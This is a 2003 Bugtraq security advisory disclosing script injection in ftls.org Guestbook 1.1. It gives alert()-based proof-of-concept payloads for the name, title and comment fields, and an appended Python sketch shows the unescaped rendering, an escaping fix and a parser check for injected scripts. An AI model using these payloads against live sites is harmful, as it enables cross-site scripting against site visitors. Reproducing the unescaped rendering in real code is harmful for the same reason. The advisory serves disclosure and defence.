[28626] in bugtraq


ftls.org Guestbook 1.1 Script Injection

daemon@ATHENA.MIT.EDU (BrainRawt .)
Sat Jan 25 05:03:46 2003

From: "BrainRawt ." <brainrawt@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sat, 25 Jan 2003 01:14:34 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F141ixjnzi95HfqR77b00000317@hotmail.com>


ftls.org Guestbook 1.1 Script Injection Vulnerabilities
Discovered By BrainRawt (brainrawt@hotmail.com)

About MyGuestbook:
------------------
Your basic guestbook that can be downloaded at
http://www.ftls.org/en/examples/cgi/Guestbook.shtml#s1.

Vulnerable (tested) Versions:
--------------------
guestbook v 1.1

Vendor Contact:
----------------
  9-27-02 - Emailed webmaster@ftls.org
12-15-02 - Emailed tyndiuk@ftls.org

Vulnerability:
----------------
guestbook.cgi improperly filters user input, making the guestbook
vulnerable to script injection.

Exploit (POC):
----------------
When filling in one's name use:
<script>alert('your_name_field_vuln_to_injection')</script>

When filling in the Title use:
<script>alert('title_field_vuln_to_injection')</script>

When filling in the Comment use:
<script>alert('comments_field_vuln')</script>

---------------------------------------------------------------------
Which looks better?  Blackhat or White? You Decide! - BrainRawt
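
Added example, not part of the original post and not the guestbook's own code: a Python sketch of the fix for the three fields named above, with a parser-based check that the rendered page carries no script element. The template markup and the function names are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser

# Field names follow the advisory (name, title, comment); the markup is assumed.
TEMPLATE = "<div class='entry'><h3>{title}</h3><b>{name}</b><p>{comment}</p></div>"

# Constructed sample submission using the advisory's proof-of-concept strings.
POC_ENTRY = {
    "name": "<script>alert('your_name_field_vuln_to_injection')</script>",
    "title": "<script>alert('title_field_vuln_to_injection')</script>",
    "comment": "<script>alert('comments_field_vuln')</script>",
}


def render_unsafe(entry):
    """Interpolate raw user input into the page (the behaviour reported)."""
    return TEMPLATE.format(**entry)


def render_escaped(entry):
    """Encode every field for an HTML text context before interpolation."""
    safe = {k: html.escape(v, quote=True) for k, v in entry.items()}
    return TEMPLATE.format(**safe)


class _ActiveContentFinder(HTMLParser):
    """Collects script elements and on* attributes the way a parser sees them."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("<script>")
        # Coarse check: any attribute whose name starts with "on" is flagged.
        self.findings += [f"{tag}@{a}" for a, _ in attrs if a.startswith("on")]


def active_content(page):
    """Return the active-content items found in rendered HTML."""
    finder = _ActiveContentFinder()
    finder.feed(page)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    print("unsafe :", active_content(render_unsafe(POC_ENTRY)))
    print("escaped:", active_content(render_escaped(POC_ENTRY)))
```

The same check can be used as a regression test after patching: render a stored entry and fail the build if `active_content` returns anything.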



